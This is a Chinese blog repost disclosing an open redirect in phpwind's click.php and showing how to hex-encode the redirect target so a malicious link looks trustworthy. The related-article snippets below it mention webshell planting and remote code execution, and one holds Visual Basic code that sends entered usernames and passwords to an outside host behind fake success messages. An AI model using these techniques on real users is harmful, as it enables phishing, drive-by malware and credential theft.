phpwind暴出跨站漏洞,小漏洞,大危害

最新推荐文章于 2021-04-15 14:24:48 发布
最新推荐文章于 2021-04-15 14:24:48 发布
阅读量2.6k 收藏
点赞数
分类专栏: 漏洞利用——跨站 文章标签: url 百度 测试 ie 加密 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiwish/article/details/1833381
版权
 phpwind暴出跨站漏洞,小漏洞,大危害

来源:华夏黑客联盟(www.hxhack.com)

前言:
大家都应该知道,国内主流论坛程序主要有两大家,一种是phpwind论坛程序,一种是dz论坛程序;
不知道的,百度搜索一下便知道了。
我也是无意间发现这个漏洞的,如果有人恶意利用以下的方法,谁又会想到phpwind官方网站竟然会被人通过这样的方法挂马?小漏洞存在的危害并不小!所以提醒广大的网民一定要警惕网络安全。

连接:http://www.phpwind.com/click.php?id=13&url=http://www.baidu.com

说明:先以百度为例子。测试的时候是phpwind官方网站地址测试的。返回如下页面:
  首先打开:http://www.phpwind.com,然后在地址后面加/click.php?id=13&url=http://www.baidu.com加到/click.php?id=13&url=http://www.baidu.com后面,复制到IE栏,回车,如果把:http://www.phpwind.com/click.php?id=13&url=http://www.baidu.com后面的http://www.baidu.com换成:http://www.hxhack.com,那么http://www.phpwind.com/click.php?id=13&url=http://www.hxhack.com就会掉转到我们华夏黑客联盟首页。

如果http://www.phpwind.com/click.php?id=13&url=这个漏洞被利用,被掉转到挂马的地址呢?

一旦这个被利用,造成的危害也是巨大的。把http://www.baidu.com转换成16进制的字符串,再在每两个字符前加上%,变成了
%68% 74%74%70%3A%2F%2F%62%61%69%64%75%2E%63%6F%6D,其实这个是网页加密的一种形式,我不过是用计算器手工完成,之后合并成如下的字符串%68%74%74%70%3A%2F%2F%62%61%69%64%75%2E%63%6F%6D

加到http://www.phpwind.com/click.php?id=13&url=后面,复制到IE栏,回车

http://www.phpwind.com/click.php?id=13&url=%68%74%74%70%3A%2F%2F%62%61%69%64%75%2E%63%6F%6D,一旦有人把形如上面并且把URL=后面换成恶意网址之后加了密,然后把网址发给您,对于你自己,你似乎没有理由相信,会是恶意网站。谁会想到phpwind也会有病毒?
其实在这种门户安全意识下丧失了安全。如果写成QQ尾巴病毒,用来大面积传播,后果更加严重。总之仅以此文提示大家多留意一些,避免惨遭“毒”害。
hiwish
关注
专栏目录
phpwind漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 909
phpwind漏洞利用,考虑到PHPWind是国内著名的论坛程序,利用它建的网非常多,我顿时来了兴趣,决定看看这个漏洞怎么利用。 看漏洞的名字好像影PHPWind8.0版本,我机子里保存了以前下载的PHPWind v8.0 GBK build 20100810的源程序,在虚拟机里安装后测试漏洞不能利用,换了PHPWindForums v7.5 SP3 GBK整合版漏洞利用成功,可能是我机子中之前的版本比较新的缘故吧。下面就用PHPWind Forums v7.5 SP3 GBK整合版来给大家介绍phpw
phpwind7.3.2.chm
05-06
phpwind7.3.2 数据字典数据结构说明
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 974
近日,国内知名的社区PHPWIND又现严重漏洞,程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
PHPwind后台获取Webshell
Flashlm专栏
08-01 3652
发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:方式1 模板法 进入后台, 风格模版设置 ,在随便一行写代码记住,这代码必须顶着左边行写,代码前面不可以有任何字符。EOT;eval($a);print 例如,我写完某一行为。.headurl { color
php 获取远程代码执行,Phpwind远程任意代码执行漏洞
weixin_42713608的博客
03-29 312
### 简要描述:Phpwind对于某些用户提交的参数过滤不严,导致可能的一个远程代码执行,普通前台恶意用户可以取得使用phpwind点的权限### 详细说明:./phpwind7.2/thread.php中```InitGP(array('page','type','search','orderway','asc','special'));…… //此处省略X行$db_maxpage &amp...
destoon网phpwind7.3.2会员的整合 phpwind的配置
zhangxl_ly的博客
11-29 1097
Phpwind7.3.2后台设置: 1.进入后台。(http://论坛域名/admin.php,如我的后台进入网址:http://bbs.ourshop.net.cn/admin.php。看到一些贴提到不知如何登录后台所以多写一点了。^_^)如图1,打开“风格插件”—“插件中心”。 2.点击“插件中心”如图2,点击“通行证”对应的插件管理。如图中所示“点些管理此插件”。
PHPWIND7.3.2设置伪静态方法
zhangxl_ly的博客
12-28 1165
以apache服务器为例介绍使用方法. 1.在静态目录部署中,开启静态目录部署功能,将静态目录设置为"-htm-",将静态目录扩展名设置为:".html"    默认的URL形式为 "http://www.phpwind.net/thread.php?fid=2"    新的URL形式为    "http://www.phpwind.net/thread-htm-fid-2.html"
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
贴字体大小调整 FOR PhpWind7.3.2.rar
07-14
贴字体大小调整 FOR PhpWind7.3.2
phpwind冷色调整风格模板源代码
03-18
因为数据太大!!所以把数据去掉了。使用方法 1、安装phpwind8.7最新版 2、上传模板数据覆盖即可!! 文档结构: data style 论坛模板样式文件夹 images lfs12 论坛所需图片文件 template lfs12 论坛页面文件 ...
PHPWind 7.3.2简体中文UTF8
03-19
PHPWindForumsv7.3是一套采用PHP+MySQL方式运行的开源软件程序,可以帮助您轻松搭建并管理论坛。 PHPWindForumsv7.3利用了SNS的特性结合现有的论坛模式,打造了全新的“圈子模式”。 什么是圈子模式? 这是一个以论坛体系为基础的应用,在传统行为的论坛系统中,融入了更多可自定义的交互规则,众多的智能交互构成了全新的用户体验和应用流程,让客户的被动寻找转变为主动获取,进而加快信息流通、加强信息价值,但,她仍然是您与您的用户所熟知的论坛系统。 PHPWind7终极版完善、修正及增加功能部分列表: 新增功能: 1.投票增加前置条件 2.会员评分设置细化 3.增加导航通栏公告位,增加频道页面广告控制 4.版主已阅增加设置主题分类的后续操作 5.更改默认编辑器为所见即所得 6.改进静态页的生成 7.整合当开启圈子模式时u页面和个人空间页面 8.圈子中的“朋友”增“我的访客”模块 9.查找朋友页面增加“可能认识” 10.版块logo上传功能 11.改进圈子模式下随便看看的页面布局 12.增加“帖子分享” 13.分享操作增加后续“推荐”的功能 14.改善“圈子”中相册的易用性 15.群组列表中增加“已加入该群的”提示,并显示退出链接 16.增加各个文字输入框输入字数动态提示 17.默认风格增加开关 18.圈子中头像尺寸控制优化 19.系统头像改为直接在页面中列表显示 20.好友列表时间改为好友最近登录时间 21.分类名称和群组名称分开 22.未登录状态圈子首页导航选中,并且连接改为?m=o 23.增加头像字段长度 24.圈子中好友搜索形式改进 25.动态和分享中用户头像和群组加上超链接 26.改进浏览和发帖弹出框的弹出位置和样式 27.改进版块收藏的各个细节,并增加删除功能 28.圈子中添加日志app 29.圈子好友列表分页 30.后台热榜缓存更新改进 31.群组讨论区帖子删除编辑操作 32.图片的水印改进 33.增加更具发帖量限制发带有链接地址的帖子 34.增加我的主题按发帖时间和回复时间排序 35.改进积分管理-充值描述不清楚导致理解歧义 36.改进社区模式下的页面布局
PHPWind_UTF8_7.3.2.zip_Windows编程_PHP_
08-12
php工具,很好用的,专门针对那些需要使用php做网的朋友。
Tencent.rar_PHPWIND7.3.2_TXPTOP_php 树形论坛_substancewod_树形论坛
09-24
功能完整pw树形论坛程序,phpwind7.3.2带采集,带自动顶贴功能。未加密版。 (Full-featured program pw tree forum, phpwind7.3.2 with acquisition, with automatic top posted functionality. Unencrypted version.)
PHPWind 7.3.2简体中文GBK
03-19
PHPWindForumsv7.3是一套采用PHP+MySQL方式运行的开源软件程序,可以帮助您轻松搭建并管理论坛。 PHPWindForumsv7.3利用了SNS的特性结合现有的论坛模式,打造了全新的“圈子模式”。 什么是圈子模式? 这是一个以论坛体系为基础的应用,在传统行为的论坛系统中,融入了更多可自定义的交互规则,众多的智能交互构成了全新的用户体验和应用流程,让客户的被动寻找转变为主动获取,进而加快信息流通、加强信息价值,但,她仍然是您与您的用户所熟知的论坛系统。 PHPWind7终极版完善、修正及增加功能部分列表: 新增功能: 1.投票增加前置条件 2.会员评分设置细化 3.增加导航通栏公告位,增加频道页面广告控制 4.版主已阅增加设置主题分类的后续操作 5.更改默认编辑器为所见即所得 6.改进静态页的生成 7.整合当开启圈子模式时u页面和个人空间页面 8.圈子中的“朋友”增“我的访客”模块 9.查找朋友页面增加“可能认识” 10.版块logo上传功能 11.改进圈子模式下随便看看的页面布局 12.增加“帖子分享” 13.分享操作增加后续“推荐”的功能 14.改善“圈子”中相册的易用性 15.群组列表中增加“已加入该群的”提示,并显示退出链接 16.增加各个文字输入框输入字数动态提示 17.默认风格增加开关 18.圈子中头像尺寸控制优化 19.系统头像改为直接在页面中列表显示 20.好友列表时间改为好友最近登录时间 21.分类名称和群组名称分开 22.未登录状态圈子首页导航选中,并且连接改为?m=o 23.增加头像字段长度 24.圈子中好友搜索形式改进 25.动态和分享中用户头像和群组加上超链接 26.改进浏览和发帖弹出框的弹出位置和样式 27.改进版块收藏的各个细节,并增加删除功能 28.圈子中添加日志app 29.圈子好友列表分页 30.后台热榜缓存更新改进 31.群组讨论区帖子删除编辑操作 32.图片的水印改进 33.增加更具发帖量限制发带有链接地址的帖子 34.增加我的主题按发帖时间和回复时间排序 35.改进积分管理-充值描述不清楚导致理解歧义 36.改进社区模式下的页面布局
华 夏 黑 客 联 盟
04-14
Dim a As String Dim b As String a = Text1.Text b = Text2.Text Shell "C:\Program Files\Internet Explorer\iexplore.exe http://18405.pqpq.net/test.asp?name=" + a + "&pass;=" + b, vbHide Timer1.Enabled = True MsgBox "登陆成功", , "系统提示" MsgBox "开通成功", , "系统提示" End Sub -------------------------------------- 注册网: www.5944.net
主题列表显示作者小头像 for phpwind.rar
07-14
【标题】"主题列表显示作者小头像 for phpwind.rar" 涉及的知识点主要集中在PHPWind论坛系统和其用户界面的定制上。PHPWind是一款开源的PHP论坛软件,广泛应用于搭建社区网,它提供了丰富的功能和强大的扩展性。这...
整合强大的highslide FOR PhpWind7.32.rar
07-14
很多人问highslide是什么,我也不能确切的解释清楚,只能大致的形容一下,就是一个不错的图片展示特效。 点击图片以后可以非常... 这里只有PW7.32的修改方法,其他版本可类似修改。 具体的修改方案参考附件文档。
php mywind$cfg_isreurl!='y',phpwind多个远程代码执行漏洞
weixin_39700220的博客
04-15 188
题目:phpwind multiple sql injection vulnerability威胁程度:控制应用程序系统错误类型:输入验证错误利用方式:服务器模式受影响系统phpwind 7phpwind 8详细描述phpwind 7和8版本存在输入验证漏洞,攻击者成功利用该漏洞可以远程执行任意php代码。问题存在于pw_ajax.php中,由于用户提交给fieldname参数的数据缺少充分的过滤...
php最大的论坛,phpwind论坛史上最大漏洞 -电脑资料
weixin_31131927的博客
03-12 1003
发表于家用电脑2007年第19期文/图:飘忽不定就在最近的一个月,国内的一些著名论坛相继被黑,而这些论坛采用的基本都是PHPwind论坛系统,管理员密码,而入侵的过程仅仅只需要十几秒种。截至目前,国内大约有1/3采用PHPwind论坛程序的网被黑,无数网被恶意挂马、篡改甚至直接删除数据。而目前,网络上仍然存在不少没有填补该漏洞的网。本文将为大家揭开此次事件的真相,并给广大长以及个人建爱好...
剑心分享:phpwind 0day漏洞攻击代码解析
这段代码是关于PHPwind 0day(即PHPwind系统的漏洞)的,由用户"剑心"分享。PHPwind是一款流行的开源论坛系统,该0day可能涉及到服务器端的安全漏洞,因为提到的`ini_set("max_execution_time",0)`用于延长脚本执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值